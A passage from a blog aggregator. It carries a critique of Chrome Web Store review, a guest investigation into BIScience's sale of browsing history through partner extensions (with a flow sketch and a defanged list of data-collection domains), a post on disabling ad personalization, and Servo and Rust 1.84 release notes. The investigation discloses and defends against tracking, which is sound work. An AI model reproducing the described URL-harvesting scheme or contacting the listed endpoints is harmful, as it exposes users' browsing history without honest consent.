It’s only with the introduction of Manifest V3 now that Chrome finally prohibits remote hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that were already long established at Mozilla when Google entered the market in 2011.

And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:

The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.

Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.

And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how they can request more privileges for their extensions while fending off complaints from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.

So what we have now is:

  1. Automated review tools that malicious actors willing to invest some effort can work around.
  2. Lots of extensions with the potential for doing considerable damage, yet little way of telling which ones have good reasons for that and which ones abuse their privileges.
  3. Manual reviews being very expensive due to historical decisions.
  4. Massively inflated extension count due to unchecked spam.

Numbers 3 and 4 in particular seem to further trap Google in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies that can put a hundred employees on devising new tricks to avoid triggering detection. Yes, malicious extensions are big business.

What could Google do?

If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, they have hundreds of other extensions in the pipeline. Tracing the relationships between extensions on the other hand and taking down the entire cluster – that would change things.

As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.

But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason to: Google Chrome no longer has to compete for market share, having essentially won against the competition. Even if Chrome extensions became unusable, Chrome would likely remain the dominant browser.

In fact, Google has significant incentives to keep one particular class of extensions down, so one might even suspect intention behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.

Wladimir PalantBIScience: Collecting browsing history under false pretenses

  • This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.

Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.

This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.

Screenshot of a website citing a bunch of numbers: 10 Million+ opt-in panelists globally and growing, 60 Global Markets, 4.5 Petabyte behavioral data collected monthly, 13 Months average retention time of panelists, 250 Million online user events per day, 2 Million eCommerce product searches per day, 10 Million keyword searches recorded daily, 400 Million unique domains tracked daily<figcaption> Screenshot of claims on the BIScience website </figcaption>

Who is BIScience?

BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partner third-party extension developers to collect and sell clickstream data from users, again under false pretenses. This SDK will send data to sclpfybn.com and other endpoints controlled by BIScience.

“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.

According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.

BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.

BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.

BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.

BIScience collects data from millions of users

BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.

The websites of BIScience and AdClarity make the following claims:

  • They collect data from 25 million users, over 250 million user events per day, 400 million unique domains
  • They process 4.5 petabytes of data every month
  • They are the “largest human panel based ad intelligence platform”

These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.

BIScience buys data from partner third-party extensions

BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.

Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.

Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.

BIScience receives raw data, not anonymized data

Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.

If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.

Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.

As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.

Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.

BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):

In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.

Misleading CWS policies compliance

When you read the Chrome Web Store privacy disclosures on every extension listing, they say:

This developer declares that your data is

  • Not being sold to third parties, outside of approved use cases
  • Not being used or transferred for purposes that are unrelated to the item’s core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes

You might wonder:

  1. How is BIScience allowed to sell user data from their own extensions to third parties, through AdClarity and other BIScience products?
  2. How are partner extensions allowed to sell user data to BIScience, a third party?

BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:

  • if necessary to providing or improving your single purpose;
  • to comply with applicable laws;
  • to protect against malware, spam, phishing, or other fraud or abuse; or,
  • as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user

The Limited Use policy later states:

All other transfers, uses, or sale of user data is completely prohibited, including:

  • Transferring, using, or selling data for personalized advertisements.
  • Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
  • Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.

BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.

Chrome Web Store appears to interpret their policies as allowing the transfer of user data, if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.

This is despite the CWS User Data FAQ stating (emphasis ours):

  1. Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
    No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.

In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.

Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt and allow the sale of user data obtained under false pretenses.

We have the receipts (contracts, emails, and more) to prove BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily for the purpose of “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.

BIScience extensions exception claims

Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.

These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs on servers, so they do not need to collect this data. They certainly don’t need to sell it to third parties.

Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.
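To make the contrast concrete, here is a minimal sketch of the client-side approach (entirely hypothetical code, not taken from any real extension, and written in Rust purely for illustration): the filter list ships with the product and every check happens locally, so no URL ever needs to leave the device.

use std::collections::HashSet;

// Hypothetical client-side blocking: the blocklist is bundled with the
// extension, and lookups happen entirely on the user's machine.
fn main() {
    let blocklist: HashSet<&str> =
        ["ads.example.com", "tracker.example.net"].into_iter().collect();

    for host in ["ads.example.com", "mail.example.org"] {
        if blocklist.contains(host) {
            println!("blocked {host} locally"); // no server round trip
        } else {
            println!("allowed {host}");
        }
    }
}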

Partner extensions exception claims, guided by BIScience

Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.

We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.

BIScience provides partner extensions with two integration options: They can add the BIScience SDK to automatically collect data, or partners can send their self-collected data to a BIScience API endpoint or S3 bucket.

The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.

BIScience SDK

The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.

The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can allege they offer safe browsing protection or ad blocking. We have not evaluated how effective this safe browsing protection is compared to reputable vendors, but we suspect it performs minimal functionality to pass casual examination. We confirmed this endpoint also collects user data to resell it, which is unrelated to the safe browsing protection.

Unnecessary features

Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.

Let’s look at this illuminating graphic, sent by BIScience to one of our sources:

A block diagram titled “This feature, whatever it may be, should justify to Google Play or Google Chrome, why you are looking for access into users url visits information.” The scheme starts with a circle labeled “Get access to user’s browsing activity.” An arrow points towards a rectangle labeled “Send all URLs, visited by user, to your backend.” An arrow points to a rhombus labeled “Does the particular URL meets some criteria?” An asterisk in the rhombus points towards a text passage: “The criteria could fall under any of your preferences: -did you list the URL as malware? -is the URL a shopping website? -does the URL contain sensitive data? -is the URL travel related? etc.” An arrow labeled “No” points to a rectangle labeled “Do nothing; just store the URL and meta data.” An arrow labeled “Yes” points to a rectangle labeled “Store URL and meta data; provide related user functionality.” Both the original question and yes/no paths are contained within a larger box labeled “User functionality” but then have arrows pointing to another rectangle outside that box labeled “Send the data to Biscience endpoint.”

Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.
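For illustration, the flow in the graphic can be condensed to the following sketch (all names are hypothetical, and the real integrations are JavaScript inside the extensions; Rust is used here only for readability). The key point is that the reporting step runs unconditionally, outside the “user functionality” box:

// Hypothetical condensation of the diagram above.
fn handle_page_visit(url: &str, device_id: &str) {
    // "User functionality" box: does the URL meet the pretext criteria
    // (malware list, shopping site, travel related, etc.)?
    if url_meets_feature_criteria(url) {
        provide_user_functionality(url); // e.g. show a "safe browsing" warning
    }
    // Outside the box: the raw URL plus metadata goes to the broker
    // regardless of the answer above.
    send_to_broker_endpoint(url, device_id);
}

fn url_meets_feature_criteria(url: &str) -> bool {
    url.contains("shop") // stand-in for whatever pretext was chosen
}

fn provide_user_functionality(url: &str) {
    println!("feature UI for {url}");
}

fn send_to_broker_endpoint(url: &str, device_id: &str) {
    // Stub standing in for an HTTP POST of the raw URL.
    println!("report: {{ id: {device_id}, url: {url} }}");
}

fn main() {
    handle_page_visit("https://example.com/shop/item", "device-1234");
}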

Misleading privacy policy disclosures

BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:

Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:

  • Detect and suggest to close malware websites;
  • Analytics and Traffic Intelligence

This and other suggested clauses contradict each other or are misleading to users.

Quick fact check:

  • Extension doesn’t sell your personal data: False, the main purpose of the integration with BIScience is to sell browsing history data.
  • Extension needs to share your personal data: False, this is not necessary for everyday business. Much less for veiled reasons such as malware protection or analytics.

An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.

Misleading user consent

BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.

As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:

Screenshot of a pop-up titled “Visual Effects is now offering Safe-Meeting.” The text says: “To allow us to enable integrated anti-mining and malicious site protection for the pages you visit please click agree to allow us access to your visited websites. Any and all data collected will be strictly anonymous.” Below it a prominent button with the label “Agree” and a much smaller link labeled “Disagree.”

We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.

Our hope for the future

When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.

Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.

If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.

Browser extension users deserve better privacy and transparency.

Related reading

If you want to learn more about browser extensions collecting your browsing history for profit:

IOCs

The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.

We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.

Collection endpoints seen in third-party extensions:

  • sclpfybn[.]com
  • tnagofsg[.]com

Collection endpoints seen in BIScience-owned extensions and software:

  • urban-vpn[.]com
  • ducunt[.]com
  • adclarity[.]com

Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):

  • sandvpn[.]com
  • getsugar[.]io

Collection endpoints seen in online data, software unknown but likely in third-party software:

  • cykmyk[.]com
  • fenctv[.]com

Collection endpoint in third-party software, identified in 2019 DataSpii research:

  • pnldsk[.]adclarity[.]com

Don MartiClick this to buy better stuff and be happier

Here’s my contender for Internet tip of the year. It’s going to take under a minute, and will not just help you buy better stuff, but also make you happier in general. Ready? Here it is, step by step.

  1. Log in to your Google account if you’re not logged in already. (If you have a Gmail or Google Drive tab open in the browser, you’re logged in.)

  2. Go to My Ad Center.

  3. Find the Personalized ads control. It looks something like this.

Personalized ads on <figcaption>Personalized ads on</figcaption>
  4. Turn it off.
Personalized ads off <figcaption>Personalized ads off</figcaption>
  5. That’s it. Unless you have another Google account. If you do have multiple Google accounts (like home, school, and work accounts), do this for each one.

This will affect the ads you get on all the Google sites and apps, including Google Search and YouTube, along with the Google ads on other sites. Google is probably going to show you some message to try to discourage you from doing this. From what I can tell from the outside, it looks like turning off personalized ads will cost Google money. Last time I checked, I got the following message.

Ads may seem less relevant. When your info isn’t used for ads, you may see fewer ads for products and brands that interest you. Non-personalized ads on Google are shown to you according to factors like the time of day, device type, your current search or the website you’re visiting, or your current location (based on your IP address or device permissions).

But what they don’t say is anything about how personalized ads will help you buy better products and services. And that’s because—and I’m going out on a limb here data-wise, but a pretty short and solid limb, and I’ll explain why—they just don’t. Choosing to turn off personalized ads somehow makes you a more satisfied shopper and better off.

How does this work?

I still don’t know exactly how this tip works, but so far there have been a few theories.

1: lower fraud risk. It’s possible that de-personalizing the ads reduces the number of scam advertisers who can successfully reach you. Bian et al., in Consumer Surveillance and Financial Fraud, show that Apple App Tracking Transparency, which reduces the ability of apps to personalize ads, tended to reduce fraud complaints to the FTC.

We estimate that the reduction in tracking reduces money lost in all complaints by 4.7% and money lost reported in internet and data security complaints by 40.1%.

That’s a pretty big effect. De-personalizing ads might mean that your employer doesn’t get compromised by an ad campaign that delivers malware targeting a specific company, and you don’t get targeted for fake ads targeted to users of a software product. Even if the increase in fraud risk for users with personalization left on is relatively small, getting scammed has a big impact and can move the average money and happiness metrics a lot.

2: more mindful buying. Another possibility is that people who get fewer personalized ads are making fewer impulse purchases. Jessica Fierro and Corrine Reichert bought a selection of products from those Temu ads that seem to be everywhere, and decided they weren’t worth it. Maybe people without personalized ads are making fewer buying decisions but each one is better thought out.

3. buy more from higher-quality vendors. Or maybe companies that put more money into personalized advertising tend to put less into improving product quality. (ICYMI: Product is the P all marketers should strive to influence, by Mark Ritson.) In Behavioral advertising and consumer welfare: An empirical investigation, Mustri et al. found that

targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products, compared to competing alternatives found in organic search results

In Why Your Brand Feels Like a Cheap Date: All Flash, No Substance in the World of Performance Marketing, Pesach Lattin writes,

Between 2019 and 2021, brands that focused on brand equity saw a 72% increase in value, compared to just 20% for brands that relied primarily on performance tactics. Ignoring brand-building not only weakens your baseline sales but forces you to spend more and more on performance marketing just to keep your head above water.

Brands that are over-focused on surveillance advertising might be forced to under-invest in product improvements.

4. limited algorithmic and personalized pricing. Personalized ads might be set up to offer the same product at higher prices to some people. The FTC was investigating, but from the research point of view, personalized pricing is really hard to tell apart from dynamic pricing. Even if you get volunteers to report prices, some might be getting a higher price because stock is running low, not because of who the individual is. So it’s hard to show how much impact this has, but hard to rule it out too.

5. it’s just a step on the journey. Another possibility is that de-personalizing the ads is a gateway to blocking ads entirely. What if, without personalization, the ads get gross or annoying enough that people tend to move up to an ad blocker? And, according to Lin et al. in The Welfare Effects of Ad Blocking,

[P]articipants that were asked to install an ad-blocker become less likely to regret recent purchases, while participants that were asked to uninstall their ad-blocker report lower levels of satisfaction with their recent purchases.

Maybe you don’t actually make better buying decisions while ads are on but personalization is off—but it’s a step toward full ad blocking where you do get better stuff and more happiness.

How do I know this works?

I’m confident that this tip works because if turning ad personalization off didn’t help you, Google would have said so a while ago. Remember the 52% paper about third-party cookies? Google made a big deal out of researching the ad revenue impact of turning cookie tracking on or off. And this ad personalization setting also has a revenue impact for Google. According to documents from one of Google’s Federal cases, keeping the number of users who turn ad personalization off low is a goal for Google—they make more money from you if you have personalization on, so they have a big incentive to try to convince you that personalization is a win-win. So why so quiet? The absence of a PDF about this is just as informative as the actual PDF would be.

And it’s not just Google. Research showing user benefits from personalized ads would be a fairly easy project not just for Google, but for any company that can both check a privacy setting and measure some kind of shopping outcome. For almost as long as Internet privacy tools have been a thing, Internet Thought Leaders have been telling us they’re not a good idea. But for a data-driven industry, they’re bringing surprisingly little data—especially considering that for many companies it’s data they already have and would only need to do stats on, make graphs, and write (or have an LLM write) the abstract and body copy.

Almost any company with a mobile app could do research to show any benefits from ad personalization, too. Are the customers who use Apple iOS and turn off tracking more or less satisfied with their orders? Do banks get more fraud reports from app users with tracking turned on or off? It would be straightforward for a lot of companies to show that turning off personalization or turning on some privacy setting makes you a less happy customer—if it did.

The closest I have found so far is Balancing User Privacy and Personalization by Malika Korganbekova and Cole Zuber. This study simulated the effects of a privacy feature by truncating browsing history for some Wayfair shoppers, and found that people who were assigned to the personalized group and chose a product personalized to them were 10% less likely to return it than people in the non-personalized group. But that’s about a bunch of vendors of similar products that were all qualified by the same online shopping platform, not about the mix of honest and dishonest personalized ads that people get in total. So go back and do the tip if you didn’t already, enjoy your improved shopping experience, and be happy. More: effective privacy tips

Related

You can’t totally turn off ad personalization on Meta sites like Facebook, but there are settings to limit the flow of targeting data in or out. See Mad at Meta? Don’t Let Them Collect and Monetize Your Personal Data by Lena Cohen at the Electronic Frontier Foundation.

B L O C K in the U S A Ad blocking is trending up, and for the first time the people surveyed gave their number one reason as privacy, not annoyance or performance.

MimiOnuoha/missing-datasets: An overview and exploration of the concept of missing datasets. by Mimi Onuoha: That which we ignore reveals more than what we give our attention to. It’s in these things that we find cultural and colloquial hints of what is deemed important. Spots that we’ve left blank reveal our hidden social biases and indifferences.

The $16 hack to blocking ads on your devices for life (I don’t know about the product or the offer, just interesting to see it on a site with ads. Maybe the affiliate revenue is a much bigger deal than the programmatic ad revenue?)

personalization risks In practice, most of the privacy risks related to advertising are the result not of identifying individuals, but of treating different people in the same context differently.

Bonus links

Samuel Bendett and David Kirichenko cover Battlefield Drones and the Accelerating Autonomous Arms Race in Ukraine. Ukrainian officials started to describe their country as a war lab for the future—highlighting for allies and partners that, because these technologies will have a significant impact on warfare going forward, the ongoing combat in Ukraine offers the best environment for continuous testing, evaluation, and refinement of [autonomous] systems. Many companies across Europe and the United States have tested their drones and other systems in Ukraine. At this point in the conflict, these companies are striving to gain battle-tested in Ukraine credentials for their products.

Aram Zucker-Scharff writes, in The bounty hunter tendency, the future of privacy, and ad tech’s new profit frontier., The new generation of laws that are authorizing citizens to become bounty hunters are implicitly tied to the use of surveillance technology. They encourage the use of citizen vs citizen surveillance and create a dangerous environment that worsens the information imbalance between wealthy citizens and everyone else. (Is this a good argument against private right of action in privacy laws? It’s likely that troll lawyers will use existing wiretapping laws against legit news sites, which tend to have long and vulnerable lists of adtech partners.)

Scharon Harding covers TVs at CES 2025. On the one hand, TVs are adding far-field microphones which, um, yikes. But on the other hand, remember how the Microsoft Windows business and gaming market helped drive down the costs of Linux-capable workstation-class hardware? What is the big innovation that developers, designers, and architects will make out of big, inexpensive screens subsidized by the surveillance business?

The Servo BlogThis month in Servo: dark mode, keyword sizes, XPath, and more!

Servo now supports dark mode (@arthmis, @lazypassion, #34532), respecting the platform dark mode in servoshell and ‘prefers-color-scheme’ (@nicoburns, #34423, stylo#93) on Windows and macOS.

servoshell in dark mode, rendering the MDN article for ‘prefers-color-scheme’ in dark mode, when Windows is set to dark mode servoshell in light mode, rendering the MDN article for ‘prefers-color-scheme’ in light mode, when Windows is set to light mode
<figcaption>MDN article for ‘prefers-color-scheme’ in dark mode (left) and light mode (right), with --pref dom.resize_observer.enabled.</figcaption>

CSS transitions can now be triggered properly by script (@mrobinson, #34486), and we now support ‘min-height’ and ‘max-height’ on column flex containers (@Loirooriol, @mrobinson, #34450), ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ in block layout (@Loirooriol, #34641, #34568, #34695), ‘stretch’ on replaced positioned elements (@Loirooriol, #34430), as well as ‘align-self: self-start’, ‘self-end’, ‘left’, and ‘right’ on positioned elements (@taniishkaaa, @Loirooriol, #34365).

Servo can now run Discord well enough to log in and read messages, though you can’t send messages yet. To get this working, we landed some bare-bones AbortController support (@jdm, @syvb, #34519) and a WebSocket fix (@jdm, #34634). Try it yourself with --pref dom.svg.enabled --pref dom.intersection_observer.enabled --pref dom.abort_controller.enabled!

Discord login screen in Servo, showing form input and a QR code that never finishes loading Discord loading screen in Servo, after logging in
Discord channel screen in Servo, showing a few of Diffie’s messages and attachments

We now support console.trace() (@simonwuelker, #34629), PointerEvent (@wusyong, #34437), and the clonable property on ShadowRoot (@simonwuelker, #34514). Shadow DOM support continues to improve (@jdm, #34503), including very basic Shadow DOM layout (@mrobinson, #34701) when enabled via --pref dom.shadowdom.enabled.

script underwent (and continues to undergo) major rework towards being more reliable and faster to build. We’ve landed better synchronisation for DOM tree mutations (@jdm, #34505) and continued work on splitting up the script crate (@jdm, #34366). We’ve moved our ReadableStream support into Servo, eliminating the maintenance burden of a downstream SpiderMonkey patch (@gterzian, @wusyong, @Taym95, #34064, #34675).

The web platform guarantees that same-origin frames and their parents can synchronously observe resizes and their effects. Many tests rely on this, and not doing this correctly made Servo’s test results much flakier than they could otherwise be. We’ve made very good progress towards fixing this (@mrobinson, #34643, #34656, #34702, #34609), with correct resizing in all cases except when a same-origin frame is in another script thread, which is rare.

We now support enough of XPath to get htmx working (@vlindhol, #34463), when enabled via --pref dom.xpath.enabled.

htmx home page in Servo, with the hero banner thing now working (it relies on XPath)

Servo’s performance continues to improve, with layout caching for flex columns delivering up to 12x speedup (@Loirooriol, @mrobinson, #34461), many unnecessary reflows now eliminated (@mrobinson, #34558, #34599, #34576, #34645), reduced memory usage (@mrobinson, @Loirooriol, #34563, #34666), faster rendering for pages with animations (@mrobinson, #34489), and timers now operating without IPC (@mrobinson, #34581).

servoshell nightlies are up to 20% smaller (@atbrakhi, #34340), WebGPU is now optional at build time (@atbrakhi, #34444), and --features tracing no longer enables --features layout-2013 (@jschwe, #34515) for further binary size savings. You can also limit the size of several of Servo’s thread pools with --pref threadpools.fallback_worker_num and others (@jschwe, #34478), which is especially useful on machines with many CPU cores.

We’ve started laying the groundwork for full incremental layout in our new layout engine, starting with a general layout caching mechanism (@mrobinson, @Loirooriol, #34507, #34513, #34530, #34586). This was lost in the switch to our new layout engine, and without it, every time a page changes, we have to rerun layout from scratch. As you can imagine, this is very, very expensive, and incremental layout is critical for performance on today’s highly dynamic web.

Donations

Thanks again for your generous support! We are now receiving 4329 USD/month (+0.8% over November) in recurring donations. With this money, we’ve been able to cover our web hosting and self-hosted CI runners for Windows, Linux, and now macOS builds (@delan, #34868), halving mach try build times from over an hour to under 30 minutes! Next month, we’ll be expanding our CI capacity further, all made possible thanks to your help.

Servo is also on thanks.dev, and already sixteen GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.


As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

The Rust Programming Language BlogAnnouncing Rust 1.84.0

The Rust team is happy to announce a new version of Rust, 1.84.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.84.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.84.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.84.0 stable

Cargo considers Rust versions for dependency version selection

1.84.0 stabilizes the minimum supported Rust version (MSRV) aware resolver, which prefers dependency versions compatible with the project's declared MSRV. This reduces the toil for maintainers supporting older toolchains, who no longer need to manually select older versions for each dependency.
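For reference, a project declares its MSRV through the rust-version field in Cargo.toml; the demo project in the output below would contain something like this:

[package]
name = "demo"
version = "0.1.0"
edition = "2021"
rust-version = "1.60"  # the declared MSRV that the resolver now respects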

You can opt-in to the MSRV-aware resolver via .cargo/config.toml:

[resolver]
incompatible-rust-versions = "fallback"

Then when adding a dependency:

$ cargo add clap
    Updating crates.io index
warning: ignoring clap@4.5.23 (which requires rustc 1.74) to maintain demo's rust-version of 1.60
      Adding clap v4.0.32 to dependencies
    Updating crates.io index
     Locking 33 packages to latest Rust 1.60 compatible versions
      Adding clap v4.0.32 (available: v4.5.23, requires Rust 1.74)

When verifying the latest dependencies in CI, you can override this:

$ CARGO_RESOLVER_INCOMPATIBLE_RUST_VERSIONS=allow cargo update
    Updating crates.io index
     Locking 12 packages to latest compatible versions
    Updating clap v4.0.32 -> v4.5.23

You can also opt-in by setting package.resolver = "3" in the Cargo.toml manifest file though that will require raising your MSRV to 1.84. The new resolver will be enabled by default for projects using the 2024 edition (which will stabilize in 1.85).

This gives library authors more flexibility when deciding their policy on adopting new Rust toolchain features. Previously, a library adopting features from a new Rust toolchain would force downstream users of that library who have an older Rust version to either upgrade their toolchain or manually select an old version of the library compatible with their toolchain (and avoid running cargo update). Now, those users will be able to automatically use older library versions compatible with their older toolchain.

See the documentation for more considerations when deciding on an MSRV policy.

Migration to the new trait solver begins

The Rust compiler is in the process of moving to a new implementation for the trait solver. The next-generation trait solver is a reimplementation of a core component of Rust's type system. It is not only responsible for checking whether trait bounds hold (e.g. Vec<T>: Clone), but is also used by many other parts of the type system, such as normalization (figuring out the underlying type of <Vec<T> as IntoIterator>::Item) and equating types (checking whether T and U are the same).

In 1.84, the new solver is used for checking coherence of trait impls. At a high level, coherence is responsible for ensuring that there is at most one implementation of a trait for a given type while considering not yet written or visible code from other crates.
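As a generic illustration of the kind of overlap coherence rules out (a textbook case, not one of the rare patterns newly detected by this change), the following program is rejected because both impls could apply to Vec<u32>:

trait Pretty {
    fn pretty(&self) -> String;
}

impl<T: Clone> Pretty for T {
    fn pretty(&self) -> String {
        String::from("some clonable value")
    }
}

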